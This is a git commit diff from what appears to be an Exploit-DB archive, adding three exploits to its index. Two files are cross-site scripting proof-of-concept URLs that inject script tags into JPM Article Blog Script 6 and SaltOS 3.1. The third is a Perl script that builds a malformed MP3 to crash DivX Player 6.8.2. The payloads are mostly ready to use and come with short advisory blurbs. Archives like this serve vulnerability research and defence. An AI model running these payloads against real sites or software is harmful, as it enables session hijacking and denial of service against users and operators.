DB: 2015-07-20
3 new exploits
This commit is contained in:
parent
8762b868bf
commit
47c7b2c110
4 changed files with 38 additions and 0 deletions
|
@ -33973,3 +33973,6 @@ id,file,description,date,author,platform,type,port
|
|||
37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
|
||||
37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
|
||||
37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
|
||||
37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service Vulnerability",2012-08-20,Dark-Puzzle,windows,dos,0
|
||||
37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting Vulnerability",2012-08-21,Mr.0c3aN,php,webapps,0
|
||||
37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting Vulnerability",2012-08-18,"Stefan Schurtz",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
7
platforms/php/webapps/37641.txt
Executable file
7
platforms/php/webapps/37641.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/55112/info
|
||||
|
||||
JPM Article Blog Script 6 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee>
|
9
platforms/php/webapps/37642.txt
Executable file
9
platforms/php/webapps/37642.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/55117/info
|
||||
|
||||
SaltOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
SaltOS 3.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script>
|
19
platforms/windows/dos/37640.pl
Executable file
19
platforms/windows/dos/37640.pl
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/55105/info
|
||||
|
||||
Divx Player is prone to a denial-of-service vulnerability.
|
||||
|
||||
An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
|
||||
|
||||
Divx 6.8.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
# usage : perl divxdOs.pl
|
||||
my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
|
||||
my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";
|
||||
|
||||
|
||||
my $file= "dark-puzzle.mp3";
|
||||
open($FILE,">$file");
|
||||
print $FILE $id.$cdat;
|
||||
close($FILE);
|
||||
print "MP3 File Created , Enjoy !!\n";
|
||||
|
Loading…
Add table
Reference in a new issue